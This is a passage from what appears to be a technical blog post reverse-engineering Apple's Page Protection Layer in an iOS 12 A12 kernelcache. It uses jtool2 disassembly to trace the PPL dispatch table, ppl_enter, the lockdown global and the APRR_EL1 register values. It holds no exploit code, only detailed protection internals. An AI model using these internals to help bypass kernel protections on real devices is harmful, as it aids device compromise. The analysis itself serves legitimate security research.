__func_0xfffffff008f51e4c 0xfffffff0077c1f30: 0xfffffff008f52a30 __func_0xfffffff008f52a30 0xfffffff0077c1f38: 0xfffffff008f525dc __func_0xfffffff008f525dc 0xfffffff0077c1f40: 0xfffffff008f51c4c __func_0xfffffff008f51c4c 0xfffffff0077c1f48: 0xfffffff008f51ba0 __func_0xfffffff008f51ba0 0xfffffff0077c1f50: 0xfffffff008f518f4 __func_0xfffffff008f518f4 0xfffffff0077c1f58: 0xfffffff008f5150c __func_0xfffffff008f5150c 0xfffffff0077c1f60: 0xfffffff008f50994 __func_0xfffffff008f50994 0xfffffff0077c1f68: 0xfffffff008f4f59c __func_0xfffffff008f4f59c 0xfffffff0077c1f70: 0xfffffff008f4de6c __func_0xfffffff008f4de6c 0xfffffff0077c1f78: 0xfffffff008f4dcac __func_0xfffffff008f4dcac 0xfffffff0077c1f80: 0xfffffff008f4dae4 __func_0xfffffff008f4dae4 0xfffffff0077c1f88: 0xfffffff008f4d7e8 __func_0xfffffff008f4d7e8 0xfffffff0077c1f90: 0xfffffff008f4d58c __func_0xfffffff008f4d58c 0xfffffff0077c1f98: 0xfffffff008f4d1ec __func_0xfffffff008f4d1ec 0xfffffff0077c1fa0: 0xfffffff008f4cef8 __func_0xfffffff008f4cef8 0xfffffff0077c1fa8: 0xfffffff008f4c038 __func_0xfffffff008f4c038 0xfffffff0077c1fb0: 0xfffffff008f48420 __func_0xfffffff008f48420 0xfffffff0077c1fb8: 0xfffffff008f4bacc __func_0xfffffff008f4bacc 0xfffffff0077c1fc0: 0xfffffff008f4b754 __func_0xfffffff008f4b754 0xfffffff0077c1fc8: 0xfffffff008f4b458 __func_0xfffffff008f4b458 0xfffffff0077c1fd0: 0xfffffff008f4b3a0 __func_0xfffffff008f4b3a0 0xfffffff0077c1fd8: 0xfffffff008f4afc4 __func_0xfffffff008f4afc4 0xfffffff0077c1fe0: 0xfffffff008f4afbc __func_0xfffffff008f4afbc 0xfffffff0077c1fe8: 0xfffffff008f4acec __func_0xfffffff008f4acec 0xfffffff0077c1ff0: 0xfffffff008f4ac38 __func_0xfffffff008f4ac38 0xfffffff0077c1ff8: 0xfffffff008f4ac34 __func_0xfffffff008f4ac34 0xfffffff0077c2000: 0xfffffff008f4aa78 __func_0xfffffff008f4aa78 0xfffffff0077c2008: 0xfffffff008f4a8b0 __func_0xfffffff008f4a8b0 0xfffffff0077c2010: 0xfffffff008f4a8a0 __func_0xfffffff008f4a8a0 0xfffffff0077c2018: 0xfffffff008f4a730 __func_0xfffffff008f4a730 0xfffffff0077c2020: 0xfffffff008f4a09c __func_0xfffffff008f4a09c 0xfffffff0077c2028: 0xfffffff008f4a098 __func_0xfffffff008f4a098 0xfffffff0077c2030: 0xfffffff008f49fbc __func_0xfffffff008f49fbc 0xfffffff0077c2038: 0xfffffff008f49d0c __func_0xfffffff008f49d0c 0xfffffff0077c2040: 0xfffffff008f49c08 __func_0xfffffff008f49c08 0xfffffff0077c2048: 0xfffffff008f49940 __func_0xfffffff008f49940 0xfffffff0077c2050: 0xfffffff008f494c0 __func_0xfffffff008f494c0 0xfffffff0077c2058: 0xfffffff008f492e8 __func_0xfffffff008f492e8 0xfffffff0077c2060: 0xfffffff008f47d54 __func_0xfffffff008f47d54 0xfffffff0077c2068: 0xfffffff008f47d58 __func_0xfffffff008f47d58 0xfffffff0077c2070: 0xfffffff008f46ea0 __func_0xfffffff008f46ea0 0xfffffff0077c2078: 0xfffffff008f46a50 __func_0xfffffff008f46a50 0xfffffff0077c2080: 0xfffffff008f45ef8 __func_0xfffffff008f45ef8 0xfffffff0077c2088: 0xfffffff008f45ca0 __func_0xfffffff008f45ca0 0xfffffff0077c2090: 0xfffffff008f45a80 __func_0xfffffff008f45a80 0xfffffff0077c2098: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20a0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20a8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20b0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20b8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20c0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20c8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20d0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20d8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20e0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20e8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20f0: 0xfffffff008f457b8 __func_0xfffffff008f457b8 0xfffffff0077c20f8: 0xfffffff008f456e4 __func_0xfffffff008f456e4 0xfffffff0077c2100: 0xfffffff008f455c8 __func_0xfffffff008f455c8 0xfffffff0077c2108: 0xfffffff008f454bc __func_0xfffffff008f454bc 0xfffffff0077c2110: 0xfffffff008f45404 __func_0xfffffff008f45404 0xfffffff0077c2118: 0xfffffff008f45274 __func_0xfffffff008f45274 0xfffffff0077c2120: 0xfffffff008f446c0 __func_0xfffffff008f446c0 0xfffffff0077c2128: 0xfffffff008f445b0 __func_0xfffffff008f445b0 0xfffffff0077c2130: 0xfffffff008f441dc __func_0xfffffff008f441dc 0xfffffff0077c2138: 0xfffffff008f44010 __func_0xfffffff008f44010 0xfffffff0077c2140: 00 00 00 00 00 00 00 00 ........ Clearly, a dispatch table - function pointers aplenty. Where do these lie? Taking any one of them and subjecting to jtool2 -a will locate it: morpheus@Chimera (~) %jtool2 -a 0xfffffff008f457b8 ~/Downloads/kernelcache.release.iphone11 Address 0xfffffff008f457b8 (offset 0x1f417b8) is in __PPLTEXT.__text This enables us to locate functions in __PPLTEXT.__text, whose addresses are not exported by LC_FUNCTION_STARTS. So that's already pretty useful. The __PPLTEXT.__text is pretty big, but we can use a very rudimentary decompilation feature, thanks to jtool2's ability to follow arguments: morpheus@Chimera (~) %jtool2 -d __PPLTEXT.__text ~/Downloads/kernelcache.release.iphone11 | grep -v ^ff | # Ignore disassembly lines grep \" | # get strings Disassembling 78564 bytes from address 0xfffffff008f44000 (offset 0x1f40000): _func_fffffff007a28554(""%s: ledger %p array index invalid, index was %#llx"", "pmap_ledger_validate" ); _func_fffffff007a28554(""%s: ledger still referenced, " "ledger=%p"", "pmap_ledger_free_internal"); _func_fffffff007a28554(""%s: invalid ledger ptr %p"", "pmap_ledger_validate"); ... These are obvious panic strings, and _func_fffffff007a28554 is indeed _panic (jtool2 could have immediately symbolicated vast swaths of the kernel if we had used --analyze - I'm deliberately walking step by step here). Note that the panic strings also give us the panicking function. That can get us the symbol names for 30 something of all them functions we found! They're all "pmap...internal", and jtool2 can just dump the strings (thanks for not redacting, AAPL!): morpheus@Chimera (~)% jtool2 -d __TEXT.__cstring ~/Downloads/kernelcache.release.iphone11 | grep pmap_.*internal Dumping 2853442 bytes from 0xfffffff0074677ec (Offset 0x4637ec, __TEXT.__cstring): 0xfffffff00747027e: pmap_ledger_free_internal 0xfffffff0074702c8: pmap_ledger_alloc_internal 0xfffffff0074706e2: pmap_ledger_alloc_init_internal 0xfffffff007470789: pmap_trim_internal 0xfffffff007470b95: pmap_iommu_ioctl_internal 0xfffffff007470d30: pmap_iommu_unmap_internal 0xfffffff007470d4a: pmap_iommu_map_internal 0xfffffff007470d7f: pmap_iommu_init_internal 0xfffffff007470e3e: pmap_cs_check_overlap_internal 0xfffffff007470e5d: pmap_cs_lookup_internal 0xfffffff007470e75: pmap_cs_associate_internal_options 0xfffffff00747188d: pmap_set_jit_entitled_internal 0xfffffff0074719ba: pmap_cpu_data_init_internal 0xfffffff007471a03: pmap_unnest_options_internal 0xfffffff007471ad7: pmap_switch_user_ttb_internal 0xfffffff007471af5: pmap_switch_internal 0xfffffff007471b0a: pmap_set_nested_internal 0xfffffff007471bcd: pmap_remove_options_internal 0xfffffff007471d61: pmap_reference_internal 0xfffffff007471d79: pmap_query_resident_internal 0xfffffff007471dc2: pmap_query_page_info_internal 0xfffffff007471e05: pmap_protect_options_internal 0xfffffff007471ebd: pmap_nest_internal 0xfffffff007472247: pmap_mark_page_as_ppl_page_internal 0xfffffff007472336: pmap_map_cpu_windows_copy_internal 0xfffffff007472386: pmap_is_empty_internal 0xfffffff00747239d: pmap_insert_sharedpage_internal 0xfffffff007472422: pmap_find_phys_internal 0xfffffff00747243a: pmap_extract_internal 0xfffffff007472450: pmap_enter_options_internal 0xfffffff0074727ee: pmap_destroy_internal 0xfffffff0074729c4: pmap_create_internal 0xfffffff0074729fc: pmap_change_wiring_internal 0xfffffff007472a53: pmap_batch_set_cache_attributes_internal The few functions we do not have, can be figured out by the context of calling them from the non-PPL pmap_* wrappers. But we still don't know how we get into PPL. Let's go to the __TEXT_EXEC.__text then. __TEXT_EXEC.__text The kernel's __TEXT_EXEC.__text is already pretty large, but adding all the Kext code into it makes it darn huge. AAPL has also stripped the kernel clean in 1469 kernelcaches - but not before leaving a farewell present in iOS 12 β 1 - a fully symbolicated (86,000+) kernel. Don't bother looking for that IPSW - In an unusual admittal of mistake this is the only beta IPSW in history that has been eradicated. Thankfully, researchers were on to this "move to help researchers", and grabbed a copy when they still could. I did the same, and based jtool2's kernel cache analysis on it. This is the tool formerly known as joker - which, if you're still using - forget about. I no longer maintain that, because now it's built into jtool2, xn00p (my kernel debugger) and soon QiLin - as fully self contained and portable library code. Running an analysis on the kernelcache is blazing fast - on order of 8 seconds or so on my MBP2018. Try this: morpheus@Chimera (~) %time jtool2 --analyze ~/Downloads/kernelcache.release.iphone11 Analyzing kernelcache.. This is an A12 kernelcache (Darwin Kernel Version 18.2.0: Wed Dec 19 20:28:53 PST 2018; root:xnu-4903.242.2~1/RELEASE_ARM64_T8020) -- Processing __TEXT_EXEC.__text.. Disassembling 22433272 bytes from address 0xfffffff0079dc000 (offset 0x9d8000): __ZN11OSMetaClassC2EPKcPKS_j is 0xfffffff007fedc64 (OSMetaClass) Analyzing __DATA_CONST.. processing flows... Analyzing __DATA.__data.. Analyzing __DATA.__sysctl_set.. Analyzing fuctions... FOUND at 0xfffffff007a2c8e4! Analyzing __PPLTEXT.__text.. Got 1881 IOKit Classes opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 Dumping symbol cache to file Symbolicated 5070 symbols to ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 jtool2 --analyze ~/Downloads/kernelcache.release.iphone11 6.07s user 0.32s system 99% cpu 6.447 total Let's ignore the __PPLTEXT autoanalysis for the moment (TL;DR - stop reading, all the symbols you need are auto symbolicated by jtool2's jokerlib. And let's look at code which happens to be a PPL client - the despicable AMFI. I'll spare you wandering out and get directly to the function in question: morpheus@Chimera (~) % JCOLOR=1 jtool2 -d __Z31AMFIIsCodeDirectoryInTrustCachePKh ~/Downloads/kernelcache.release.iphone11 opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 Disassembling 13991556 bytes from address 0xfffffff0081e8f74 (offset 0x11e4f74): __Z31AMFIIsCodeDirectoryInTrustCachePKh: fffffff0081e8f74 0xd503237f PACIBSP ; fffffff0081e8f78 0xa9bf7bfd STP X29, X30, [SP, #-16]! ; fffffff0081e8f7c 0x910003fd ADD X29, SP, #0 ; R29 = R31 + 0x0 fffffff0081e8f80 0x97e65da4 BL 0xfffffff007b80610 ; _func_0xfffffff007b80610 _func_0xfffffff007b80610() fffffff0081e8f84 0x12000000 AND W0, W0, #0x1 ; fffffff0081e8f88 0xa8c17bfd LDP X29, X30, [SP], #0x10 ; fffffff0081e8f8c 0xd65f0fff RETAB ; When used on a function name, jtool2 automatically disassembles to the end of the function. We see that this is merely a wrapper over _func_0xfffffff007b80610. So we inspect what's there: morpheus@Chimera (~) %jtool2 -d _func_0xfffffff007b80610 ~/Downloads/kernelcache.release.iphone11 _func_0xfffffff007b80610: fffffff007b80610 0x17f9ba10 B 0xfffffff0079eee50 So...: _func_fffffff0079eee50: fffffff0079eee50 0xd280050f MOVZ X15, 0x28 ; R15 = 0x28 fffffff0079eee54 0x17ffd59e B 0xfffffff0079e44cc ; _ppl_enter _func_fffffff0079eee58: fffffff0079eee58 0xd280052f MOVZ X15, 0x29 ; R15 = 0x29 fffffff0079eee5c 0x17ffd59c B 0xfffffff0079e44cc ; _ppl_enter _func_fffffff0079eee60: fffffff0079eee60 0xd280042f MOVZ X15, 0x21 ; R15 = 0x21 fffffff0079eee64 0x17ffd59a B 0xfffffff0079e44cc ; _ppl_enter _func_fffffff0079eee68: fffffff0079eee68 0xd280082f MOVZ X15, 0x41 ; R15 = 0x41 fffffff0079eee6c 0x17ffd598 B 0xfffffff0079e44cc ; _ppl_enter _func_fffffff0079eee70: fffffff0079eee70 0xd280084f MOVZ X15, 0x42 ; R15 = 0x42 fffffff0079eee74 0x17ffd596 B 0xfffffff0079e44cc ; _ppl_enter And, as we can see, here is the X15 we saw back in __PPLTRAMP! Its value gets loaded and then a common jump to a function at 0xfffffff0079e44cc (already symbolicated as _ppl_enter in the above example). Disassembling a bit before and after will reveal a whole slew of these MOVZ,B,MOVZ,B,MOVZ,B... Using jtool2's new Gadget Finder (which I just imported from disarm): morpheus@Chimera (~) % jtool2 -G MOVZ,B,MOVZ,B,MOVZ,B,MOVZ,B ~/Downloads/kernelcache.release.iphone11 | grep X15 0x9eacb8: MOVZ X15, 0x0 0x9eacb8: MOVZ X15, 0x1 0x9eacb8: MOVZ X15, 0x2 0x9eacb8: MOVZ X15, 0x3 0x9eacd8: MOVZ X15, 0x6 0x9eacd8: MOVZ X15, 0x7 0x9eacd8: MOVZ X15, 0x8 0x9eacd8: MOVZ X15, 0x9 0x9eacf8: MOVZ X15, 0xa 0x9eacf8: MOVZ X15, 0xb 0x9eacf8: MOVZ X15, 0xc 0x9eacf8: MOVZ X15, 0xd 0x9ead18: MOVZ X15, 0xe 0x9ead18: MOVZ X15, 0xf 0x9ead18: MOVZ X15, 0x11 0x9ead18: MOVZ X15, 0x12 0x9ead38: MOVZ X15, 0x13 0x9ead38: MOVZ X15, 0x14 0x9ead38: MOVZ X15, 0x15 0x9ead38: MOVZ X15, 0x16 0x9ead58: MOVZ X15, 0x17 0x9ead58: MOVZ X15, 0x18 0x9ead58: MOVZ X15, 0x19 0x9ead58: MOVZ X15, 0x1a 0x9ead78: MOVZ X15, 0x1b 0x9ead78: MOVZ X15, 0x1f 0x9ead78: MOVZ X15, 0x20 0x9ead78: MOVZ X15, 0x22 0x9ead98: MOVZ X15, 0x5 0x9ead98: MOVZ X15, 0x10 0x9ead98: MOVZ X15, 0x4 0x9ead98: MOVZ X15, 0x1c 0x9eadb8: MOVZ X15, 0x1d 0x9eadb8: MOVZ X15, 0x1e 0x9eadb8: MOVZ X15, 0x23 0x9eadb8: MOVZ X15, 0x24 0x9eadd8: MOVZ X15, 0x40 0x9eadd8: MOVZ X15, 0x3a 0x9eadd8: MOVZ X15, 0x3b 0x9eadd8: MOVZ X15, 0x3c 0x9eadf8: MOVZ X15, 0x3d 0x9eadf8: MOVZ X15, 0x3e 0x9eadf8: MOVZ X15, 0x3f 0x9eadf8: MOVZ X15, 0x2a 0x9eae18: MOVZ X15, 0x2b 0x9eae18: MOVZ X15, 0x2c 0x9eae18: MOVZ X15, 0x2d 0x9eae18: MOVZ X15, 0x2e 0x9eae38: MOVZ X15, 0x25 0x9eae38: MOVZ X15, 0x26 0x9eae38: MOVZ X15, 0x27 0x9eae38: MOVZ X15, 0x28 0x9eae58: MOVZ X15, 0x29 0x9eae58: MOVZ X15, 0x21 0x9eae58: MOVZ X15, 0x41 0x9eae58: MOVZ X15, 0x42 Naturally, a pattern as obvious as this cannot go unnoticed by the joker module, so if you did run jtool2 --analyze all these MOVZ,B snippets will be properly symbolicated. But now let's look at the common code, _ppl_enter: _ppl_enter: fffffff0079e44cc 0xd503237f PACIBSP ; fffffff0079e44d0 0xa9be57f4 STP X20, X21, [SP, #-32]! ; fffffff0079e44d4 0xa9017bfd STP X29, X30, [SP, #16] ; fffffff0079e44d8 0x910043fd ADD X29, SP, #16 ; R29 = R31 + 0x10 fffffff0079e44dc 0xd538d08a MRS X10, TPIDR_EL1 ; fffffff0079e44e0 0xb944714c LDR W12, [X10, #1136] ; ...R12 = *(R10 + 1136) = *0x470 fffffff0079e44e4 0x1100058c ADD W12, W12, #1 ; R12 = R12 + 0x1 = 0x471 fffffff0079e44e8 0xb904714c STR W12, [X10, #1136] ; *0x470 = R12 fffffff0079e44ec 0x9000ac6d ADRP X13, 5516 ; R13 = 0xfffffff008f70000 fffffff0079e44f0 0x9101c1ad ADD X13, X13, #112 ; R13 = R13 + 0x70 = 0xfffffff008f70070 fffffff0079e44f4 0xb94001ae LDR W14, [X13, #0] ; ...R14 = *(R13 + 0) = *0xfffffff008f70070 fffffff0079e44f8 0x6b1f01df CMP W14, WZR, ... ; fffffff0079e44fc 0x54000280 B.EQ 0xfffffff0079e454c ; fffffff0079e4500 0x5280000a MOVZ W10, 0x0 ; R10 = 0x0 fffffff0079e4504 0x1455deb7 B 0xfffffff008f5bfe0 ; morpheus@Chimera (~) %jtool2 -a 0xfffffff008f70070 ~/Downloads/kernelcache.release.iphone11 opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 Address 0xfffffff008f70070 (offset 0x1f6c070) is in __PPLDATA.__data morpheus@Chimera (~) %jtool2 -d 0xfffffff008f70070,4 ~/Downloads/kernelcache.release.iphone11 | head -5 opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 Dumping 4 bytes from 0xfffffff008f70070 (Offset 0x1f6c070, __PPLDATA.__data): 0xfffffff008f70070: 00 00 00 00 ..... Hmm. all zeros. Note there was a check for that (in fffffff0079e44fc), which redirected us to 0xfffffff0079e454c. There, we find: _func_fffffff0079e454c: fffffff0079e454c 0xf10111ff CMP X15, #68 ; fffffff0079e4550 0x54000162 B.CS 0xfffffff0079e457c ; fffffff0079e4554 0xb0ffeee9 ADRP X9, 2096605 ; R9 = 0xfffffff0077c1000 fffffff0079e4558 0x913c8129 ADD X9, X9, #3872 ; R9 = R9 + 0xf20 = 0xfffffff0077c1f20 fffffff0079e455c 0xf86f792a -LDR X10, [X9, X15 ...] ; R0 = 0x0 fffffff0079e4560 0xd63f095f BLRAA X10 ; fffffff0079e4564 0xaa0003f4 MOV X20, X0 ; fffffff0079e4568 0x94069378 BL 0xfffffff007b89348 ; __enable_preemption __enable_preemption(ARG0); fffffff0079e456c 0xaa1403e0 MOV X0, X20 ; fffffff0079e4570 0xa9417bfd LDP X29, X30, [SP, #0x10] ; fffffff0079e4574 0xa8c257f4 LDP X20, X21, [SP], #0x20 ; fffffff0079e4578 0xd65f0fff RETAB ; fffffff0079e457c 0xa9417bfd LDP X29, X30, [SP, #0x10] ; fffffff0079e4580 0xa8c257f4 LDP X20, X21, [SP], #0x20 ; fffffff0079e4584 0xd50323ff AUTIBSP ; fffffff0079e4588 0xb000ad00 ADRP X0, 5537 ; R0 = 0xfffffff008f85000 fffffff0079e458c 0x91102000 ADD X0, X0, #1032 ; R0 = R0 + 0x408 = 0xfffffff008f85408 fffffff0079e4590 0x14010ff1 B 0xfffffff007a28554 ; _panic _panic ("ppl_dispatch: failed due to bad argument/state."); So, again, a check for > 68, on which we'd panic (and we know this function is ppl_dispatch!). OTherwise, a switch style jump (BLRAA X10 = Branch and Link Authenticated with Key A) to 0xfffffff0077c1f20 - the table we just discussed above. So what is this 0xfffffff008f70070? An integer, which is likely a boolean, since it gets STR'ed with one. We can call this one _ppl_initialized, or possible _ppl_locked. You'll have to ask AAPL for the symbol (or wait for iOS 13 β ;-). But I would go for _ppl_locked since there is a clear setting of this value to '1' in _machine_lockdown() (which I have yet to symbolicate in jtool2: _func_fffffff007b90664: fffffff007b90664 0xd503237f PACIBSP ; fffffff007b90668 0xa9bf7bfd STP X29, X30, [SP, #-16]! ; fffffff007b9066c 0x910003fd ADD X29, SP, #0 ; R29 = R31 + 0x0 fffffff007b90670 0x90009f08 ADRP X8, 5088 ; R8 = 0xfffffff008f70000 fffffff007b90674 0x320003e9 ORR W9, WZR, #0x1 ; R9 = 0x1 fffffff007b90678 0xb9007109 STR W9, [X8, #112] ; *0xfffffff008f70070 = R9 = 1 fffffff007b9067c 0x52800000 MOVZ W0, 0x0 ; R0 = 0x0 fffffff007b90680 0x52800001 MOVZ W1, 0x0 ; R1 = 0x0 fffffff007b90684 0x97f979b7 BL 0xfffffff0079eed60 ; _ppl_pmap_return _ppl_pmap_return(0,0); fffffff007b90688 0xa8c17bfd LDP X29, X30, [SP], #0x10 ; fffffff007b9068c 0xd50323ff AUTIBSP ; fffffff007b90690 0x17fffed6 B 0xfffffff007b901e8 ; Therefore, PPL will have been locked by the time _ppl_enter does anything. Meaning it will jump to 0xfffffff008f5bfe0. That's in _PPLTRAMP - right where we started. To save you scrolling up, let's look at this code, piece by piece: fffffff008f5bfe0 0xd53b4234 MRS X20, DAIF ; fffffff008f5bfe4 0xd50347df MSR DAIFSet, #7 ; #(DAIFSC_ASYNC | DAIFSC_IRQF | DAIFSC_FIQF) fffffff008f5bfe8 ---------- *MOVKKKK X14, 0x4455445564666677 ; fffffff008f5bff8 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 ; S3_4_C15_C2_1 fffffff008f5bffc 0xd5033fdf ISB ; fffffff008f5c000 0xd50347df MSR DAIFSet, #7 ; X - 0 0x0 fffffff008f5c004 ---------- *MOVKKKK X14, 0x4455445564666677 fffffff008f5c014 0xd53cf235 MRS X21, ARM64_REG_APRR_EL1 ; S3_4_C15_C2_1 fffffff008f5c018 0xeb1501df CMP X14, X21, ... ; fffffff008f5c01c 0x540005e1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c020 0xf10111ff CMP X15, #68 ; fffffff008f5c024 0x540005a2 B.CS 0xfffffff008f5c0d8 ; ... fffffff008f5c0d8 0xd280004f MOVZ X15, 0x2 ; R15 = 0x2 fffffff008f5c0dc 0xaa1403ea MOV X10, X20 ; fffffff008f5c0e0 0x14001fc3 B 0xfffffff008f63fec ; We start by reading the DAIF, which is the set of SPSR flags holding interrupt state. We then block all interrupts. Next, a load of a rather odd value into S3_4_C15_C2_1, which jtool2 (unlike *cough* certain Rubenesque disassemblers) can correctly identify as a special register - ARM64_REG_APRR_EL1. An Instruction Sync Barrier (ISB) follows, and then a check is made that the setting of the register "stuck". If it didn't, or if X15 is over 68 - we go to fffffff008f5c0d8. And you know where that's going, since X15 greater than 68 is an invalid operation. fffffff008f63fec ---------- *MOVKKKK X14, 0x4455445464666477 fffffff008f63ffc 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 fffffff008f64000 0xd5033fdf ISB ; fffffff008f64004 0xf1000dff CMP X15, #3 ; fffffff008f64008 0x54000520 B.EQ 0xfffffff008f640ac ; fffffff008f6400c 0xf27a095f TST X10, #448 ; fffffff008f64010 0x54000140 B.EQ 0xfffffff008f64038 ; fffffff008f64014 0xf27a055f TST X10, #192 ; fffffff008f64018 0x540000c0 B.EQ 0xfffffff008f64030 ; fffffff008f6401c 0xf278015f TST X10, #256 ; fffffff008f64020 0x54000040 B.EQ 0xfffffff008f64028 ; fffffff008f64024 0x14000006 B 0xfffffff008f6403c ; fffffff008f64028 0xd50344ff MSR DAIFClr, #4 ; (DAIF_ASYNC) fffffff008f6402c 0x14000004 B 0xfffffff008f6403c ; fffffff008f64030 0xd50343ff MSR DAIFClr, #3 ; (DAIF_IRQF) fffffff008f64034 0x14000002 B 0xfffffff008f6403c ; fffffff008f64038 0xd50347ff MSR DAIFClr, #7 ; (DAIF_FIQF) fffffff008f6403c 0xf10005ff CMP X15, #1 ; fffffff008f64040 0x54000380 B.EQ 0xfffffff008f640b0 ; fffffff008f64044 0xd538d08a MRS X10, TPIDR_EL1 ; fffffff008f64048 0xb944714c LDR W12, [X10, #1136] ; ...R12 = *(R10 + 1136) = *0x470 fffffff008f6404c 0x3500004c CBNZ X12, 0xfffffff008f64054 ; fffffff008f64050 0x17a9fedb B 0xfffffff0079e3bbc ; The register will be set to another odd value (6477), and then a check will be performed on X15, which won't pass, since we know it was set to 2 back in fffffff008f5c0d8. X10, if you look back, holds the DAIF, because it was moved from X20 (holding the DAIF from back in fffffff008f5bfe0), where X15 was set. This is corroborated by the TST/B.EQ which jump to clear the corresponding DAIF_.. flags. Then, at 0xfffffff008f6403c, another check on X15 - but remember it's 2. So no go. There is a check on the current thread_t (held in TPIDR_EL1) at offet 1136, and if not zero - We'll end up at 0x...79e3bbc which is: _func_fffffff0079e3bbc: fffffff0079e3bbc 0xd538d080 MRS X0, TPIDR_EL1 ; fffffff0079e3bc0 0xf81f0fe0 STR X0, [SP, #496]! ; *0xf80 = R0 fffffff0079e3bc4 0x10000040 ADR X0, #8 ; R0 = 0xfffffff0079e3bcc fffffff0079e3bc8 0x94011263 BL 0xfffffff007a28554 ; _panic _panic(0xfffffff0079e3bcc); fffffff0079e3bcc 0x65657250 DCD 0x65657250 ; fffffff0079e3bd0 0x6974706d LDP W13, W28, [X3, #0x1a0] ; fffffff0079e3bd4 0x63206e6f DCD 0x63206e6f ; fffffff0079e3bd8 0x746e756f __2DO 0x746e756f ; fffffff0079e3bdc 0x67656e20 DCD 0x67656e20 ; fffffff0079e3be0 0x76697461 __2DO 0x76697461 ; fffffff0079e3be4 0x6e6f2065 DCD 0x6e6f2065 ; fffffff0079e3be8 0x72687420 ANDS W0, W1, #50159344557 ; fffffff0079e3bec 0x20646165 DCD 0x20646165 ; fffffff0079e3bf0 0x00007025 DCD 0x7025 ; A call to panic, and funny enough though jtool v1 could show the string, jtool2 can't yet because it's embedded as data in code. JTOOL2 ISN'T PERFECT, AND, YES, PEDRO, IT MIGHT CRASH ON MALICIOUS BINARIES. But it works superbly well on AAPL binaries, and I don't see Hopper/IDA types getting this far without resorting to scripting and/or Internet symbol databases.. With that disclaimer aside, the panic is: # jtool v1 cannot do compressed kernel cache, so first you need jtool2 morpheus@Chimera (~) %jtool2 -dec ~/Downloads/kernelcache.release.iphone11 Decompressed kernel written to /tmp/kernel # Note the use of jtool v1's -dD, forcing dump as data. This will # eventually make it to jtool2. I just have other things to handle first.. morpheus@Chimera (~) %jtool -dD 0xfffffff0079e3bcc,100 /tmp/kernel Dumping from address 0xfffffff0079e3bcc (Segment: __TEXT_EXEC.__text) Address : 0xfffffff0079e3bcc = Offset 0x9dfbcc 0xfffffff0079e3bcc: 50 72 65 65 6d 70 74 69 Preemption count 0xfffffff0079e3bd4: 6f 6e 20 63 6f 75 6e 74 negative on thr 0xfffffff0079e3bdc: 20 6e 65 67 61 74 69 76 ead %p....8..... Which is the code of _preempt_underflow (from osfmk/arm64/locore.s) so it makes perfect sense. Else, we branch, go through ast_taken_kernel() (func_fffffff007a1e000, and AST are irrelevant for this discussion, and covered in Volume II anyway), and then to the very last snippet of code, which is the familiar error message we had encountered earlier: fffffff008f640a0 0xf10009ff CMP X15, #2 fffffff008f640a4 0x54000080 B.EQ 0xfffffff008f640b4 ; fffffff008f640a8 0xd65f0fff RETAB ; fffffff008f640ac 0xd61f0320 BR X25 ; fffffff008f640b0 0x17ab113a B 0xfffffff007a28598 ; _panic_trap_to_debugger fffffff008f640b4 0xb0000100 ADRP X0, 33 ; R0 = 0xfffffff008f85000 fffffff008f640b8 0x91102000 ADD X0, X0, #1032 ; R0 = R0 + 0x408 = 0xfffffff008f85408 fffffff008f640bc 0x17ab1126 B 0xfffffff007a28554 ; _panic morpheus@Chimera (~) %jtool2 -d 0xfffffff008f85408 ~/Downloads/kernelcache.release.iphone11 0xfffffff008f85408: 70 70 6C 5F 64 69 73 70 ppl_disp 0xfffffff008f85410: 61 74 63 68 3A 20 66 61 atch: fa 0xfffffff008f85418: 69 6C 65 64 20 64 75 65 iled due 0xfffffff008f85420: 20 74 6F 20 62 61 64 20 to bad 0xfffffff008f85428: 61 72 67 75 6D 65 6E 74 argument 0xfffffff008f85430: 73 2F 73 74 61 74 65 00 s/state. ... The APRR Register So what are the references to S3_4_C15_C2_1, a.k.a ARM64_REG_APRR_EL1 ? The following disassembly offers a clue. fffffff0079e30fc 0xd53cf220 MRS X0, ARM64_REG_APRR_EL1 ; fffffff0079e3100 ---------- *MOVKKKK X1, 0x4455445464666477 ; fffffff0079e310c 0xf28c8ee1 MOVK X1, 0x6477 ; R1 += 0x6477 = 0x445544446c049bfb fffffff0079e3110 0xeb01001f CMP X0, X1, ... ; fffffff0079e3114 0x540067e1 B.NE 0xfffffff0079e3e10 ; .. _func_fffffff0079e3e10 fffffff0079e3e10 0xa9018fe2 STP X2, X3, [SP, #24] ; fffffff0079e3e14 0xb000ac61 ADRP X1, 5517 ; R1 = 0xfffffff008f70000 fffffff0079e3e18 0xb9407021 LDR W1, [X1, #112] ; ...R1 = *(R1 + 112) = *0xfffffff008f70070 fffffff0079e3e1c 0xb4000e21 CBZ X1, 0xfffffff0079e3fe0 ; fffffff0079e3e20 ---------- *MOVKKKK X1, 0x4455445564666677 ; fffffff0079e3e30 0xeb01001f CMP X0, X1, ... ; fffffff0079e3e34 0x54000001 B.NE 0xfffffff0079e3e34 ; We see that the value of the register is read into X0, and compared to 0x4455445464666477. If it doesn't match, a call is made to ..fffffff0079e3e10, which checks the value of our global at 0xfffffff008f70070. If it's 0, we move elsewhere. Otherwise, we check that the register value is 0x4455445564666677 - and if not, we hang (fffffff0079e3e34 branches to itself on not equal). In other words, the value of the 0xfffffff008f70070 global correlates with 0x4455445564666477 and 4455445564666677 (I know, confusing, blame AAPL, not me) in ARM64_REG_APRR_EL1 - implying that the register provides the hardware level lockdown, whereas the global tracks the state. DARTs, etc We still haven't looked at the 